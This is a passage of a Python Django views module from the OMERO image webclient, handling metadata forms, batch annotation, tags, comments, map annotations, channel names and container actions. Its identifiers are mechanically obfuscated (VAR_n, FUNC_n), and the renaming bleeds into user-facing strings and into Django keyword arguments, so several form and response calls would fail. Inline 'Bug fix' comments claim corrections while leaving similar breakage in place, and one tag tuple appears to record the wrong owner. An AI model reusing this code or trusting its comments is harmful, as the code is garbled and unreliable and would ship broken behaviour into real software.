                        VAR_139 = list(VAR_6.getEnumerationEntries("MediumI"))
                    if VAR_140 is None:
                        VAR_140 = list(VAR_6.getEnumerationEntries("ImmersionI"))
                    if VAR_141 is None:
                        VAR_141 = list(VAR_6.getEnumerationEntries("CorrectionI"))
                    VAR_427 = MetadataObjectiveForm(
                        VAR_115={
                            "objective": o,
                            "mediums": VAR_139,
                            "immersions": VAR_140,
                            "corrections": VAR_141,
                        }
                    )
                    VAR_129.append(VAR_427)
                VAR_394 = list(VAR_352.getFilters())
                if len(VAR_394) > 0:
                    for f in VAR_394:
                        VAR_435 = MetadataFilterForm(
                            VAR_115={
                                "filter": f,
                                "types": list(
                                    VAR_6.getEnumerationEntries("FilterTypeI")
                                ),
                            }
                        )
                        VAR_131.append(VAR_435)
                VAR_395 = list(VAR_352.getDichroics())
                for VAR_362 in VAR_395:
                    VAR_428 = MetadataDichroicForm(VAR_115={"dichroic": VAR_362})
                    VAR_132.append(VAR_428)
                VAR_396 = list(VAR_352.getDetectors())
                if len(VAR_396) > 0:
                    for VAR_362 in VAR_396:
                        VAR_436 = MetadataDetectorForm(
                            VAR_115={
                                "detectorSettings": None,
                                "detector": VAR_362,
                                "types": list(
                                    VAR_6.getEnumerationEntries("DetectorTypeI")
                                ),
                            }
                        )
                        VAR_133.append(VAR_436)
                VAR_397 = list(VAR_352.getLightSources())
                if len(VAR_397) > 0:
                    for laser in VAR_397:
                        VAR_437 = VAR_136
                        if laser.OMERO_CLASS == "Arc":
                            VAR_437 = VAR_137
                        elif laser.OMERO_CLASS == "Filament":
                            VAR_437 = VAR_138
                        VAR_438 = MetadataLightSourceForm(
                            VAR_115={
                                "lightSource": laser,
                                "lstypes": VAR_437,
                                "mediums": list(
                                    VAR_6.getEnumerationEntries("LaserMediumI")
                                ),
                                "pulses": list(VAR_6.getEnumerationEntries("PulseI")),
                            }
                        )
                        VAR_135.append(VAR_438)
    VAR_53 = {"manager": VAR_104, "share_id": VAR_25}
    if VAR_23 not in ("share", "discussion", "tag"):
        VAR_53["form_channels"] = VAR_134
        VAR_53["form_environment"] = VAR_126
        VAR_53["form_objective"] = VAR_127
        VAR_53["form_microscope"] = VAR_128
        VAR_53["form_instrument_objectives"] = VAR_129
        VAR_53["form_filters"] = VAR_131
        VAR_53["form_dichroics"] = VAR_132
        VAR_53["form_detectors"] = VAR_133
        VAR_53["form_lasers"] = VAR_135
        VAR_53["form_stageLabel"] = VAR_130
    VAR_53["template"] = VAR_54
    return VAR_53
@login_required()
@render_response()
def FUNC_42(VAR_2, VAR_26, VAR_6=None, VAR_25=None, **VAR_7):
    """Return the original (as-imported) metadata for an image.

    Raises Http404 when the image does not exist; returns HTTP 408 when
    loading the metadata times out on a server-side lock.
    """
    VAR_142 = VAR_6.getObject("Image", VAR_26)
    if VAR_142 is None:
        raise Http404("No Image found with ID %s" % VAR_26)
    VAR_53 = {
        "template": "webclient/annotations/original_metadata.html",
        "imageId": VAR_142.getId(),
    }
    try:
        VAR_181 = VAR_142.loadOriginalMetadata()
        if VAR_181 is not None:
            VAR_53["original_metadata"] = VAR_181[0]
            VAR_53["global_metadata"] = VAR_181[1]
            VAR_53["series_metadata"] = VAR_181[2]
    except omero.LockTimeout:
        # Bug fix: HttpResponse has no "VAR_286"/"VAR_313" kwargs — the
        # intended Django kwargs are content= and status=.
        return HttpResponse(content="LockTimeout", status=408)
    return VAR_53
def FUNC_43(VAR_2, VAR_6=None):
    """Load the objects named by id in the request's GET/POST parameters.

    Returns a dict keyed by object type ("image", "dataset", ...) whose
    values are lists of the corresponding loaded objects (empty when no
    ids of that type were supplied).
    """
    params = VAR_2.GET or VAR_2.POST

    def _load(param_key, model_name):
        # Same semantics as the original "len(...) > 0 and list(...) or list()".
        ids = params.getlist(param_key)
        if len(ids) > 0:
            return list(VAR_6.getObjects(model_name, ids))
        return list()

    share_ids = params.getlist("share")
    shares = [VAR_6.getShare(share_ids[0])] if len(share_ids) > 0 else list()
    return {
        "image": _load("image", "Image"),
        "dataset": _load("dataset", "Dataset"),
        "project": _load("project", "Project"),
        "screen": _load("screen", "Screen"),
        "plate": _load("plate", "Plate"),
        "acquisition": _load("acquisition", "PlateAcquisition"),
        "well": _load("well", "Well"),
        "share": shares,
    }
def FUNC_44(VAR_2):
    """Collect the raw id lists from the request, keyed by plural type name."""
    params = VAR_2.GET or VAR_2.POST
    key_pairs = (
        ("images", "image"),
        ("datasets", "dataset"),
        ("projects", "project"),
        ("screens", "screen"),
        ("plates", "plate"),
        ("acquisitions", "acquisition"),
        ("wells", "well"),
        ("shares", "share"),
    )
    return {plural: params.getlist(single) for plural, single in key_pairs}
@login_required()
@render_response()
def FUNC_45(VAR_2, VAR_6=None, **VAR_7):
    """Build the batch-annotate panel context for the selected objects.

    Gathers the selected objects, checks annotate permissions and group
    membership, and collects fileset/figure-script info for the template.
    """
    VAR_143 = FUNC_43(VAR_2, VAR_6)
    VAR_144 = []          # "type=id" tokens for all selected objects
    VAR_145 = []          # display labels: {"type", "id", "name"}
    VAR_146 = set()       # distinct group ids across the selection
    VAR_147 = False       # message when annotation is not permitted
    for VAR_310 in VAR_143:
        VAR_144 += ["%s=%s" % (VAR_310, o.id) for o in VAR_143[VAR_310]]
        for o in VAR_143[VAR_310]:
            VAR_146.add(o.getDetails().group.id.val)
            if not o.canAnnotate():
                VAR_147 = (
                    "Can't add annotations because you don't" " have permissions"
                )
            VAR_145.append({"type": VAR_310.title(), "id": o.id, "name": o.getName()})
    VAR_148 = "&".join(VAR_144)
    VAR_149 = "|".join(VAR_144).replace("=", "-")
    if len(VAR_146) == 0:
        # Nothing loadable was selected; tags alone cannot be batch-annotated.
        if (
            len(VAR_2.GET.getlist("tag")) > 0
            or len(VAR_2.GET.getlist("tagset")) > 0
        ):
            return HttpResponse("<h2>Can't batch annotate VAR_164</h2>")
        else:
            return handlerInternalError(VAR_2, "No objects found")
    VAR_150 = list(VAR_146)[0]
    VAR_6.SERVICE_OPTS.setOmeroGroup(VAR_150)
    VAR_104 = BaseContainer(VAR_6)
    VAR_117 = VAR_104.listFigureScripts(VAR_143)
    VAR_151 = VAR_104.canExportAsJpg(VAR_2, VAR_143)
    VAR_152 = None
    VAR_153 = []
    if "image" in VAR_143 and len(VAR_143["image"]) > 0:
        VAR_153 = [VAR_318.getId() for VAR_318 in VAR_143["image"]]
    if len(VAR_153) > 0:
        # Combine fileset and archived-file counts/sizes for the images.
        VAR_152 = VAR_6.getFilesetFilesInfo(VAR_153)
        VAR_283 = VAR_6.getArchivedFilesInfo(VAR_153)
        VAR_152["count"] += VAR_283["count"]
        VAR_152["size"] += VAR_283["size"]
    VAR_53 = {
        "iids": VAR_153,
        "obj_string": VAR_148,
        "link_string": VAR_149,
        "obj_labels": VAR_145,
        "batch_ann": True,
        "figScripts": VAR_117,
        "canExportAsJpg": VAR_151,
        "filesetInfo": VAR_152,
        "annotationBlocked": VAR_147,
        "differentGroups": False,
    }
    if len(VAR_146) > 1:
        # Cross-group selections cannot be annotated together.
        VAR_53["annotationBlocked"] = (
            "Can't add annotations because" " objects are in different groups"
        )
        VAR_53["differentGroups"] = True  # E.g. don't run VAR_203 etc
    VAR_53["canDownload"] = VAR_104.canDownload(VAR_143)
    VAR_53["template"] = "webclient/annotations/FUNC_45.html"
    VAR_53["webclient_path"] = VAR_350("webindex")
    VAR_53["annotationCounts"] = VAR_104.getBatchAnnotationCounts(
        FUNC_43(VAR_2, VAR_6)
    )
    return VAR_53
@login_required()
@render_response()
def FUNC_46(VAR_2, VAR_6=None, **VAR_7):
    """Render (GET) or process (POST) the file-annotation form for a selection.

    On POST, links the chosen existing file annotations and/or a newly
    uploaded file to all selected objects and returns the annotation ids.
    """
    VAR_154 = FUNC_43(VAR_2, VAR_6)
    VAR_114 = FUNC_44(VAR_2)
    VAR_115 = {
        "selected": VAR_114,
        "images": VAR_154["image"],
        "datasets": VAR_154["dataset"],
        "projects": VAR_154["project"],
        "screens": VAR_154["screen"],
        "plates": VAR_154["plate"],
        "acquisitions": VAR_154["acquisition"],
        "wells": VAR_154["well"],
    }
    # Switch the service to the group of the first selected object.
    for obs in VAR_154.values():
        if len(obs) > 0:
            VAR_6.SERVICE_OPTS.setOmeroGroup(obs[0].getDetails().group.id.val)
            break
    VAR_155 = sum([len(VAR_114[types]) for types in VAR_114])
    if VAR_155 == 0:
        raise Http404("Need to specify objects via e.g. ?VAR_142=1")
    VAR_104 = None
    if VAR_155 == 1:
        for VAR_431 in VAR_114:
            if len(VAR_114[VAR_431]) > 0:
                VAR_28 = VAR_431[:-1]  # "images" -> "image"
                VAR_29 = VAR_114[VAR_431][0]
                break
        if VAR_28 in (
            "dataset",
            "project",
            "image",
            "screen",
            "plate",
            "acquisition",
            "well",
            "comment",
            "file",
            "tag",
            "tagset",
        ):
            if VAR_28 == "tagset":
                VAR_28 = "tag"
            VAR_94 = {}
            if VAR_28 is not None and int(VAR_29) > 0:
                VAR_94[VAR_345(VAR_28)] = int(VAR_29)
            try:
                VAR_104 = BaseContainer(VAR_6, **VAR_94)
            except AttributeError as x:
                return handlerInternalError(VAR_2, x)
    if VAR_104 is not None:
        VAR_284 = VAR_104.getFilesByObject()
    else:
        VAR_104 = BaseContainer(VAR_6)
        for VAR_215, VAR_143 in VAR_154.items():
            if len(VAR_143) > 0:
                VAR_284 = VAR_104.getFilesByObject(
                    VAR_12=VAR_215, parent_ids=[o.getId() for o in VAR_143]
                )
                break
    VAR_115["files"] = VAR_284
    if VAR_2.method == "POST":
        # Bug fix: was "VAR_115=initial" — "initial" is undefined here; the
        # form must be seeded with the initial dict built above.
        VAR_285 = FilesAnnotationForm(VAR_115=VAR_115, VAR_158=VAR_2.POST.copy())
        if VAR_285.is_valid():
            VAR_284 = VAR_285.cleaned_data["files"]
            VAR_353 = []
            if VAR_284 is not None and len(VAR_284) > 0:
                VAR_353 = VAR_104.createAnnotationsLinks("file", VAR_284, VAR_154)
            VAR_234 = (
                "annotation_file" in VAR_2.FILES
                and VAR_2.FILES["annotation_file"]
                or None
            )
            if VAR_234 is not None and VAR_234 != "":
                VAR_398 = VAR_104.createFileAnnotations(VAR_234, VAR_154)
                VAR_353.append(VAR_398)
            return JsonResponse({"fileIds": VAR_353})
        else:
            return HttpResponse(VAR_285.errors)
    else:
        # Bug fix: same undefined "initial" on the unbound-form path.
        VAR_285 = FilesAnnotationForm(VAR_115=VAR_115)
    VAR_53 = {"form_file": VAR_285}
    VAR_54 = "webclient/annotations/files_form.html"
    VAR_53["template"] = VAR_54
    return VAR_53
@login_required()
@render_response()
def FUNC_47(VAR_2, VAR_6=None, **VAR_7):
    """Apply the POSTed rating to every selected object."""
    if VAR_2.method != "POST":
        raise Http404("Only POST supported")
    rating = getIntOrDefault(VAR_2, "rating", 0)
    for selected in FUNC_43(VAR_2, VAR_6).values():
        for obj in selected:
            obj.setRating(rating)
    return JsonResponse({"success": True})
@login_required()
@render_response()
def FUNC_48(VAR_2, VAR_6=None, **VAR_7):
    """Create a comment annotation on the selected objects (or on a share)."""
    if VAR_2.method != "POST":
        raise Http404("Unbound instance of VAR_22 not available.")
    VAR_154 = FUNC_43(VAR_2, VAR_6)
    VAR_114 = FUNC_44(VAR_2)
    VAR_115 = {
        "selected": VAR_114,
        "images": VAR_154["image"],
        "datasets": VAR_154["dataset"],
        "projects": VAR_154["project"],
        "screens": VAR_154["screen"],
        "plates": VAR_154["plate"],
        "acquisitions": VAR_154["acquisition"],
        "wells": VAR_154["well"],
        "shares": VAR_154["share"],
    }
    if len(VAR_154["share"]) < 1:
        # Not a share: switch to the group of the first selected object.
        for obs in VAR_154.values():
            if len(obs) > 0:
                VAR_6.SERVICE_OPTS.setOmeroGroup(obs[0].getDetails().group.id.val)
                break
    # Bug fix: was "VAR_115=initial" — "initial" is undefined; seed the form
    # with the initial dict built above.
    VAR_157 = CommentAnnotationForm(VAR_115=VAR_115, VAR_158=VAR_2.POST.copy())
    if VAR_157.is_valid():
        VAR_286 = VAR_157.cleaned_data["comment"]
        if VAR_286 is not None and VAR_286 != "":
            if VAR_154["share"] is not None and len(VAR_154["share"]) > 0:
                VAR_399 = VAR_154["share"][0].id
                VAR_104 = BaseShare(VAR_6, VAR_399)
                VAR_400 = "%s?server=%i" % (
                    VAR_2.build_absolute_uri(
                        VAR_350("load_template", args=["public"])
                    ),
                    int(VAR_6.server_id),
                )
                VAR_401 = VAR_104.addComment(VAR_400, VAR_286)
                VAR_53 = {
                    "tann": VAR_401,
                    "added_by": VAR_6.getUserId(),
                    "template": "webclient/annotations/comment.html",
                }
            else:
                VAR_104 = BaseContainer(VAR_6)
                VAR_34 = VAR_104.createCommentAnnotations(VAR_286, VAR_154)
                VAR_53 = {"annId": VAR_34, "added_by": VAR_6.getUserId()}
        return VAR_53
    else:
        return HttpResponse(VAR_345(VAR_157.errors))
@login_required()
@render_response()
def FUNC_49(VAR_2, VAR_6=None, **VAR_7):
    """Create, update, duplicate or delete map annotations on a selection.

    POST data: "mapAnnotation" is a JSON list of [key, value] pairs,
    "annId" lists existing annotations to update, "ns" sets the namespace,
    and "duplicate" controls one-annotation-per-object behaviour.
    """
    if VAR_2.method != "POST":
        raise Http404(
            "Need to POST map annotation VAR_158 as list of" " ['key', 'value'] pairs"
        )
    VAR_154 = FUNC_43(VAR_2, VAR_6)
    if len(VAR_154["share"]) < 1:
        for obs in VAR_154.values():
            if len(obs) > 0:
                VAR_6.SERVICE_OPTS.setOmeroGroup(obs[0].getDetails().group.id.val)
                break
    VAR_158 = VAR_2.POST.get("mapAnnotation")
    VAR_158 = json.loads(VAR_158)
    VAR_159 = VAR_2.POST.getlist("annId")
    VAR_90 = VAR_2.POST.get("ns", omero.constants.metadata.NSCLIENTMAPANNOTATION)
    if len(VAR_159) == 0 and len(VAR_158) > 0:
        VAR_287 = VAR_2.POST.get("duplicate", "false")
        # Bug fix: the comparison result was discarded, leaving VAR_287 a
        # (always-truthy) string; assign it so the flag is a real boolean.
        VAR_287 = VAR_287.lower() == "true"
        if VAR_90 == omero.constants.metadata.NSCLIENTMAPANNOTATION:
            VAR_287 = True
        if VAR_287:
            # One new annotation per object.
            for VAR_413, VAR_143 in VAR_154.items():
                for VAR_38 in VAR_143:
                    VAR_180 = omero.gateway.MapAnnotationWrapper(VAR_6)
                    VAR_180.setValue(VAR_158)
                    VAR_180.setNs(VAR_90)
                    VAR_180.save()
                    VAR_159.append(VAR_180.getId())
                    VAR_38.linkAnnotation(VAR_180)
        else:
            # One shared annotation linked to every object.
            VAR_180 = omero.gateway.MapAnnotationWrapper(VAR_6)
            VAR_180.setValue(VAR_158)
            VAR_180.setNs(VAR_90)
            VAR_180.save()
            VAR_159.append(VAR_180.getId())
            for VAR_413, VAR_143 in VAR_154.items():
                for VAR_38 in VAR_143:
                    VAR_38.linkAnnotation(VAR_180)
    else:
        for VAR_34 in VAR_159:
            VAR_180 = VAR_6.getObject("MapAnnotation", VAR_34)
            if VAR_180 is None:
                continue
            if len(VAR_158) > 0:
                VAR_180.setValue(VAR_158)
                VAR_180.save()
            else:
                # Empty data means delete the annotation.
                VAR_84 = VAR_6.deleteObjects("/Annotation", [VAR_34])
                try:
                    VAR_6._waitOnCmd(VAR_84)
                finally:
                    VAR_84.close()
    if len(VAR_158) == 0:
        VAR_159 = None
    return {"annId": VAR_159}
@login_required()
@render_response()
def FUNC_50(VAR_2, VAR_6=None, **VAR_7):
    """Return tag listings (tags/descriptions/owners/count) as JSON."""
    VAR_101 = FUNC_0(VAR_2, "group", -1)
    VAR_6.SERVICE_OPTS.setOmeroGroup(VAR_345(VAR_101))
    try:
        VAR_177 = int(VAR_2.GET.get("offset"))
        VAR_88 = int(VAR_2.GET.get("limit", 1000))
    except Exception:
        VAR_177 = VAR_88 = None
    VAR_160 = VAR_2.GET.get("jsonmode")
    if VAR_160 == "tagcount":
        VAR_288 = VAR_6.getTagCount()
        # Bug fix: was dict(VAR_288=tag_count) — "tag_count" is undefined.
        return dict(VAR_288=VAR_288)
    VAR_104 = BaseContainer(VAR_6)
    # Bug fix: keyword values referenced undefined "offset"/"limit".
    VAR_104.loadTagsRecursive(eid=-1, VAR_177=VAR_177, VAR_88=VAR_88)
    VAR_161 = VAR_104.tags_recursive
    VAR_162 = VAR_104.tags_recursive_owners
    if VAR_160 == "tags":
        VAR_71 = list((VAR_318, VAR_431, o, s) for VAR_318, VAR_362, VAR_431, o, s in VAR_161)
        return VAR_71
    elif VAR_160 == "desc":
        return dict((VAR_318, VAR_362) for VAR_318, VAR_362, VAR_431, o, s in VAR_161)
    elif VAR_160 == "owners":
        return VAR_162
    return HttpResponse()
@login_required()
@render_response()
def FUNC_51(VAR_2, VAR_6=None, **VAR_7):
    """Render (GET) or process (POST) the tag-annotation form for a selection.

    On POST, links the chosen tags, creates any new tags, and removes
    tags the current user deselected.
    """
    VAR_154 = FUNC_43(VAR_2, VAR_6)
    VAR_114 = FUNC_44(VAR_2)
    VAR_155 = sum([len(VAR_114[types]) for types in VAR_114])
    VAR_104 = None
    VAR_163 = VAR_6.getEventContext().userId
    VAR_164 = []
    for obs in VAR_154.values():
        if len(obs) > 0:
            VAR_6.SERVICE_OPTS.setOmeroGroup(obs[0].getDetails().group.id.val)
            break
    VAR_165, VAR_166 = tree.marshal_annotations(
        VAR_6,
        VAR_44=VAR_114["projects"],
        VAR_45=VAR_114["datasets"],
        VAR_46=VAR_114["images"],
        VAR_47=VAR_114["screens"],
        VAR_48=VAR_114["plates"],
        VAR_85=VAR_114["acquisitions"],
        VAR_86=VAR_114["wells"],
        VAR_89="tag",
        VAR_88=VAR_1,
    )
    VAR_167 = {}
    for VAR_232 in VAR_166:
        VAR_167[VAR_232["id"]] = VAR_232
    if VAR_155 > 1:
        # Keep only tags this user linked to *every* selected object.
        VAR_289 = {}
        for VAR_431 in VAR_165:
            VAR_354 = VAR_431["id"]
            if VAR_354 not in VAR_289:
                VAR_289[VAR_354] = 0
            if VAR_431["link"]["owner"]["id"] == VAR_163:
                VAR_289[VAR_354] += 1
        VAR_165 = [VAR_431 for VAR_431 in VAR_165 if VAR_289[VAR_431["id"]] == VAR_155]
    VAR_168 = []
    for tag in VAR_165:
        VAR_290 = tag["link"]["owner"]["id"]
        VAR_103 = VAR_167[VAR_290]
        VAR_291 = "%s %s" % (VAR_103["firstName"], VAR_103["lastName"])
        VAR_292 = True
        VAR_293 = tag["link"]["date"]
        VAR_294 = VAR_290 == VAR_163
        VAR_168.append(
            (tag["id"], VAR_163, VAR_291, VAR_292, VAR_293, VAR_294)
        )
    # Bug fix: list.sort() takes the keyword "key", not "VAR_310".
    VAR_168.sort(key=lambda x: x[0])
    VAR_115 = {
        "selected": VAR_114,
        "images": VAR_154["image"],
        "datasets": VAR_154["dataset"],
        "projects": VAR_154["project"],
        "screens": VAR_154["screen"],
        "plates": VAR_154["plate"],
        "acquisitions": VAR_154["acquisition"],
        "wells": VAR_154["well"],
    }
    if VAR_2.method == "POST":
        # Bug fix: was "VAR_115=initial" — "initial" is undefined here.
        VAR_295 = TagsAnnotationForm(VAR_115=VAR_115, VAR_158=VAR_2.POST.copy())
        VAR_296 = NewTagsAnnotationFormSet(
            prefix="newtags", VAR_158=VAR_2.POST.copy()
        )
        if VAR_295.is_valid() and VAR_296.is_valid():
            VAR_355 = [stag[0] for stag in VAR_168 if stag[5]]
            VAR_355 = list(set(VAR_355))
            VAR_356 = list(VAR_295.cleaned_data["tags"])
            VAR_164 = [tag for tag in VAR_356 if tag not in VAR_355]
            VAR_357 = [tag for tag in VAR_355 if tag not in VAR_356]
            VAR_104 = BaseContainer(VAR_6)
            if VAR_164:
                VAR_104.createAnnotationsLinks("tag", VAR_164, VAR_154)
            VAR_358 = []
            for VAR_22 in VAR_296.forms:
                VAR_358.append(
                    VAR_104.createTagAnnotations(
                        VAR_22.cleaned_data["tag"],
                        VAR_22.cleaned_data["description"],
                        VAR_154,
                        tag_group_id=VAR_22.cleaned_data["tagset"],
                    )
                )
            for remove in VAR_357:
                VAR_402 = BaseContainer(VAR_6, tag=remove)
                VAR_402.remove(
                    [
                        "%s-%s" % (VAR_215, VAR_38.id)
                        for VAR_215, VAR_143 in VAR_154.items()
                        for VAR_38 in VAR_143
                    ],
                    tag_owner_id=VAR_163,
                )
            return JsonResponse({"added": VAR_164, "removed": VAR_357, "new": VAR_358})
        else:
            return HttpResponse(VAR_345(VAR_295.errors))
    else:
        # Bug fix: same undefined "initial" on the unbound-form path.
        VAR_295 = TagsAnnotationForm(VAR_115=VAR_115)
        VAR_296 = NewTagsAnnotationFormSet(prefix="newtags")
    VAR_53 = {
        "form_tags": VAR_295,
        "newtags_formset": VAR_296,
        "selected_tags": VAR_168,
    }
    VAR_54 = "webclient/annotations/tags_form.html"
    VAR_53["template"] = VAR_54
    return VAR_53
@require_POST
@login_required()
@render_response()
def FUNC_52(VAR_2, VAR_26, VAR_6=None, **VAR_7):
    """Rename the channels of an image, optionally applying to a parent's images."""
    image = VAR_6.getObject("Image", VAR_26)
    channel_count = image.getSizeC()
    names_by_key = {}
    names_by_index = {}
    for c in range(channel_count):
        label = VAR_2.POST.get("channel%d" % c, None)
        if label is None:
            continue
        label = smart_str(label)[:255]  # Truncate to fit in DB
        names_by_key["channel%d" % c] = label
        names_by_index[c + 1] = label
    if VAR_2.POST.get("confirm_apply", None) is None:
        return {"error": "No VAR_411 found to apply Channel Names"}
    parent = VAR_2.POST.get("parentId", None)
    if parent is not None:
        # Apply across all images under the given parent container.
        parent_type = parent.split("-")[0].title()
        parent_id = VAR_241(parent.split("-")[1])
        counts = VAR_6.setChannelNames(
            parent_type, [parent_id], names_by_index, channelCount=channel_count
        )
    else:
        counts = VAR_6.setChannelNames("Image", [image.getId()], names_by_index)
    payload = {"channelNames": names_by_key}
    if counts:
        payload["imageCount"] = counts["imageCount"]
        payload["updateCount"] = counts["updateCount"]
    return payload
@login_required(setGroupContext=True)
@render_response()
def FUNC_53(
    VAR_2, VAR_27, VAR_28=None, VAR_29=None, VAR_6=None, **VAR_7
):
    """Dispatch container-management actions (create/edit/rename/remove/delete).

    VAR_27 selects the action; VAR_28/VAR_29 identify the target object
    type and id. Most actions reply with a JSON {"bad": ...} dict; the
    edit actions return a template context instead.
    """
    VAR_54 = None
    VAR_104 = None
    if VAR_28 in (
        "dataset",
        "project",
        "image",
        "screen",
        "plate",
        "acquisition",
        "well",
        "comment",
        "file",
        "tag",
        "tagset",
    ):
        VAR_94 = {}
        if VAR_28 is not None and int(VAR_29) > 0:
            VAR_29 = int(VAR_29)
            VAR_94[VAR_345(VAR_28)] = VAR_29
        try:
            VAR_104 = BaseContainer(VAR_6, **VAR_94)
        except AttributeError as x:
            return handlerInternalError(VAR_2, x)
    elif VAR_28 in ("share", "sharecomment", "chat"):
        VAR_104 = BaseShare(VAR_6, VAR_29)
    else:
        VAR_104 = BaseContainer(VAR_6)
    VAR_22 = None
    if VAR_27 == "addnewcontainer":
        if not VAR_2.method == "POST":
            # Bug fix: JsonResponse takes "status", not "VAR_313".
            return JsonResponse(
                {"Error": "Must use POST to create container"}, status=405
            )
        VAR_22 = ContainerForm(VAR_158=VAR_2.POST.copy())
        if VAR_22.is_valid():
            VAR_0.debug("Create new in %s: %s" % (VAR_28, VAR_345(VAR_22.cleaned_data)))
            VAR_3 = VAR_22.cleaned_data["name"]
            VAR_360 = VAR_22.cleaned_data["description"]
            VAR_103 = VAR_22.cleaned_data["owner"]
            # Bug fix (4x below): keyword values referenced undefined "owner";
            # the cleaned-data owner is bound to VAR_103.
            if VAR_28 == "project" and hasattr(VAR_104, VAR_28) and VAR_29 > 0:
                VAR_40 = VAR_104.createDataset(VAR_3, VAR_360, VAR_103=VAR_103)
            elif VAR_28 == "tagset" and VAR_29 > 0:
                VAR_40 = VAR_104.createTag(VAR_3, VAR_360, VAR_103=VAR_103)
            elif VAR_2.POST.get("folder_type") in (
                "project",
                "screen",
                "dataset",
                "tag",
                "tagset",
            ):
                VAR_439 = VAR_2.POST.get("folder_type")
                if VAR_439 == "dataset":
                    VAR_40 = VAR_104.createDataset(
                        VAR_3,
                        VAR_360,
                        VAR_103=VAR_103,
                        img_ids=VAR_2.POST.getlist("image", None),
                    )
                else:
                    VAR_40 = VAR_6.createContainer(
                        VAR_439, VAR_3, VAR_360, VAR_103=VAR_103
                    )
            else:
                return HttpResponseServerError("Object does not exist")
            VAR_361 = {"bad": "false", "id": VAR_40}
            return JsonResponse(VAR_361)
        else:
            VAR_362 = dict()
            for e in VAR_22.errors.items():
                VAR_362.update({e[0]: unicode(e[1])})
            VAR_361 = {"bad": "true", "errs": VAR_362}
            return JsonResponse(VAR_361)
    elif VAR_27 == "edit":
        if VAR_29 is None:
            raise Http404("No share ID")
        if VAR_28 == "share" and int(VAR_29) > 0:
            VAR_54 = "webclient/public/share_form.html"
            VAR_104.getMembers(VAR_29)
            VAR_104.getComments(VAR_29)
            VAR_403 = list(VAR_6.getExperimenters())
            # Bug fix: list.sort() takes the keyword "key", not "VAR_310".
            VAR_403.sort(key=lambda x: x.getOmeName().lower())
            VAR_115 = {
                "message": VAR_104.share.message,
                "expiration": "",
                "shareMembers": VAR_104.membersInShare,
                "enable": VAR_104.share.active,
                "experimenters": VAR_403,
            }
            if VAR_104.share.getExpireDate() is not None:
                VAR_115["expiration"] = VAR_104.share.getExpireDate().strftime(
                    "%Y-%m-%d"
                )
            # Bug fix: was "VAR_115=initial" — "initial" is undefined here.
            VAR_22 = ShareForm(VAR_115=VAR_115)  # 'guests':share.guestsInShare,
            VAR_53 = {"manager": VAR_104, "form": VAR_22}
    elif VAR_27 == "save":
        if not VAR_2.method == "POST":
            return HttpResponseRedirect(
                VAR_350("manage_action_containers", args=["edit", VAR_28, VAR_29])
            )
        if VAR_28 == "share":
            VAR_403 = list(VAR_6.getExperimenters())
            # Bug fix: list.sort() takes the keyword "key", not "VAR_310".
            VAR_403.sort(key=lambda x: x.getOmeName().lower())
            VAR_22 = ShareForm(
                VAR_115={"experimenters": VAR_403}, VAR_158=VAR_2.POST.copy()
            )
            if VAR_22.is_valid():
                VAR_0.debug("Update share: %s" % (VAR_345(VAR_22.cleaned_data)))
                VAR_381 = VAR_22.cleaned_data["message"]
                VAR_440 = VAR_22.cleaned_data["expiration"]
                VAR_64 = VAR_22.cleaned_data["members"]
                VAR_441 = VAR_22.cleaned_data["enable"]
                VAR_400 = "%s?server=%i" % (
                    VAR_2.build_absolute_uri(
                        VAR_350("load_template", args=["public"])
                    ),
                    int(VAR_6.server_id),
                )
                VAR_104.updateShareOrDiscussion(
                    VAR_400, VAR_381, VAR_64, VAR_441, VAR_440
                )
                VAR_71 = "enable" if VAR_441 else "disable"
                return HttpResponse(VAR_71)
            else:
                VAR_54 = "webclient/public/share_form.html"
                VAR_53 = {"share": VAR_104, "form": VAR_22}
        else:
            return HttpResponseServerError("Object does not exist")
    elif VAR_27 == "editname":
        if hasattr(VAR_104, VAR_28) and VAR_29 > 0:
            VAR_38 = getattr(VAR_104, VAR_28)
            VAR_54 = "webclient/ajax_form/container_form_ajax.html"
            if VAR_28 == "tag":
                VAR_443 = VAR_38.textValue
            else:
                VAR_443 = VAR_38.getName()
            VAR_22 = ContainerNameForm(VAR_115={"name": VAR_443})
            VAR_53 = {"manager": VAR_104, "form": VAR_22}
        else:
            return HttpResponseServerError("Object does not exist")
    elif VAR_27 == "savename":
        if not VAR_2.method == "POST":
            return HttpResponseRedirect(
                VAR_350("manage_action_containers", args=["edit", VAR_28, VAR_29])
            )
        if hasattr(VAR_104, VAR_28) and VAR_29 > 0:
            VAR_22 = ContainerNameForm(VAR_158=VAR_2.POST.copy())
            if VAR_22.is_valid():
                VAR_0.debug("Update VAR_3 VAR_22:" + VAR_345(VAR_22.cleaned_data))
                VAR_3 = VAR_22.cleaned_data["name"]
                VAR_361 = {"bad": "false", "o_type": VAR_28}
                VAR_104.updateName(VAR_28, VAR_3)
                return JsonResponse(VAR_361)
            else:
                VAR_362 = dict()
                for e in VAR_22.errors.items():
                    VAR_362.update({e[0]: unicode(e[1])})
                VAR_361 = {"bad": "true", "errs": VAR_362}
                return JsonResponse(VAR_361)
        else:
            return HttpResponseServerError("Object does not exist")
    elif VAR_27 == "editdescription":
        if hasattr(VAR_104, VAR_28) and VAR_29 > 0:
            VAR_38 = getattr(VAR_104, VAR_28)
            VAR_54 = "webclient/ajax_form/container_form_ajax.html"
            VAR_22 = ContainerDescriptionForm(VAR_115={"description": VAR_38.description})
            VAR_53 = {"manager": VAR_104, "form": VAR_22}
        else:
            return HttpResponseServerError("Object does not exist")
    elif VAR_27 == "savedescription":
        if not VAR_2.method == "POST":
            return HttpResponseServerError(
                "Action '%s' on the '%s' id:%s cannot be complited"
                % (VAR_27, VAR_28, VAR_29)
            )
        if hasattr(VAR_104, VAR_28) and VAR_29 > 0:
            VAR_22 = ContainerDescriptionForm(VAR_158=VAR_2.POST.copy())
            if VAR_22.is_valid():
                VAR_0.debug("Update VAR_3 VAR_22:" + VAR_345(VAR_22.cleaned_data))
                VAR_360 = VAR_22.cleaned_data["description"]
                VAR_104.updateDescription(VAR_28, VAR_360)
                VAR_361 = {"bad": "false"}
                return JsonResponse(VAR_361)
            else:
                VAR_362 = dict()
                for e in VAR_22.errors.items():
                    VAR_362.update({e[0]: unicode(e[1])})
                VAR_361 = {"bad": "true", "errs": VAR_362}
                return JsonResponse(VAR_361)
        else:
            return HttpResponseServerError("Object does not exist")
    elif VAR_27 == "remove":
        VAR_82 = VAR_2.POST["parent"]
        try:
            VAR_104.remove(VAR_82.split("|"))
        except Exception as x:
            VAR_0.error(traceback.format_exc())
            VAR_361 = {"bad": "true", "errs": VAR_345(x)}
            return JsonResponse(VAR_361)
